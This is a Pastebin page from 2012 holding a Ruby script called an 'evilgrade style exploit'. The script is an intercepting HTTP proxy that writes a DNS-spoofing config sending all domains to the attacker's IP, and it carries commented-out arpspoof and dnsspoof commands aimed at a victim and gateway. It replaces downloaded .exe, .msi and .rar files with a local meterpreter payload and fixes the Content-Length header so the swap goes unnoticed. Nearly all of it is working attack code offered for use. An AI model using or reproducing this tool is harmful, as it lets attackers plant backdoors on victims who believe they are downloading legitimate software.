Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

evilgrade style exploit. . . by bigmac

By: a guest on Oct 11th, 2012  |  syntax: Ruby  |  size: 4.38 KB  |  views: 347  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. #sudo ruby proxy.rb port
  2. #sudo ruby proxy.rb 666
  3. #sudo is need for opening a socket
  4. require 'eventmachine' #must install eventeventmachine
  5. prox_port=ARGV[0]
  6. attacker_ip="192.168.0.2" #local host
  7. meterpreter="/tmp/meterpreter" # search this script and replace /home/bigmac/tmp/meterpreter
  8. #meterpreter.EXE meterpreter.MSI meterpreter.RAR meterpreter.ZIP
  9. #if the meterpreter exist with the file extension the client is attempting to download then the switch will be made
  10.  
  11. dns = File.open("dns.conf", "w+")   # set up for dns spoofing domains to this proxy
  12. dns.write("#{attacker_ip}        *.*")# this is your ip,
  13. dns.close
  14.  
  15.  
  16. #      uncommment these lines when you want to use arpsoof/dns
  17. #victim="192.168.1.111"
  18. #gateway="192.168.1.1"
  19. #`pkill spoof`
  20. #a=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{victim} #{gateway}'"}
  21. #c=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{gateway} #{victim}'"}
  22. #b=Thread.new{system"xterm -e 'dnsspoof -i wlan0 -f dns.conf'"}
  23. #a.run
  24. #b.run
  25. #c.run
  26. Thread.start{
  27. class Client < EM::Connection
  28.         def initialize(other, finger, *args, &blk)
  29.                 @other, @finger = other, finger
  30.                 super(*args, &blk)
  31.         end
  32.  
  33.  
  34.         def post_init
  35.         @payload_extension=""
  36.           send_data @finger.sub("Accept-Encoding:","Assept-Ensoding:") #send a get request, but disable encoding gzip
  37.                 for x in [".exe",".rar",".msi"]# payload format list, checking for file extension... add more of these to the list
  38.                         extension_check=@finger.scan(/#{x}/).to_s
  39.                         if extension_check.length>1
  40.                         @payload_extension<<extension_check
  41.                         end
  42.                 end
  43.                 if @payload_extension.length==0
  44.                         @payload_extension=""
  45.                
  46.                 end
  47.                
  48.         end
  49.  
  50. #Content-Type: application/x-msdos-program
  51. #Content-Type: application/x-msdownload
  52. #Content-Type: application/octet-stream
  53. #Content-Type: application/x-msihttp://www.i8igmac.tk/file.exe
  54. #Content-Type: application/x-rar
  55. #Content-Type: application/octet-stream
  56. #a list of possable application download... maybe check the GET request for jar? exe? msi? rar?
  57.  
  58.         def receive_data(response)  # this is the part that the web client will see... change with evil code
  59.          clength = response.scan(/Content-Length: \d+/).to_s.sub("Content-Length: ","")
  60.                 if response.scan("Content-Length: ").to_s == "Content-Length: " # if true
  61.                        
  62.                         if @payload_extension.length>1 # if true
  63.                                 for trigger in ["application/x-msdos-program","application/x-msdownload","application/octet-stream","application/x-msi","applictation/x-rar","application/rar","application/octet-stream"] # add more triggers to this list
  64.                                         if response.scan("#{trigger}").to_s.length>1 # if string is found, trigger
  65.                        
  66.                                                 if File.exists?("/tmp/meterpreter#{@payload_extension.downcase}")#= true
  67.                                                 puts " injecting #{@payload_extension} SUCCESS"#we need to check if payload exist and use this extension
  68.                                                 payload=File.read("/tmp/meterpreter#{@payload_extension.downcase}")#if the payload  does not exist then this will break the script
  69.                                                 headers,body = response.split("\r\n\r\n", 2)
  70.                                                 @other.send_data headers.gsub(clength,payload.length.to_s)+"\r\n\r\n"+payload
  71.                                                 else
  72.                                                 puts "payload does not exist? meterpreter#{@payload_extension} sending unmodified data"
  73.                                                 end
  74.                                
  75.                                         end
  76.                                 end #start for trigger loop
  77.                         end#start of if payload extension.length
  78.                        
  79.                 end
  80.                         @other.send_data response
  81.                         #if no injection was found, send the unmodifi we pass to the webbrowsered response to the client
  82.         end
  83.        
  84.        
  85.        
  86.        
  87.  
  88. end
  89.       #browser open to http://192.168.1.114
  90.       module EchoServer
  91.        def receive_data(finger) #finger is the header recived from the client, could log these cookies or log these pages
  92.          ping = finger.gsub(" ","").index("Host:")
  93.          pong = finger.gsub(" ","").index("\n",ping)
  94.          host = finger.gsub(" ","")[ping..pong].gsub("Host:","").chomp #old method for gathering the host: field... could shorten this
  95.          #i dont know if this will prevent loading from cache
  96.          data=finger.sub("If-None-Match:","If-None-MutXX:").sub("If-Modified-Since:","If-Modified-SXnce:")
  97.           EventMachine::connect host, 80, Client, self, data # ask google for response...
  98.         end
  99. end
  100. }
  101.       EventMachine::run {
  102.         EventMachine::start_server attacker_ip, prox_port, EchoServer
  103.       }        #             YOUR IP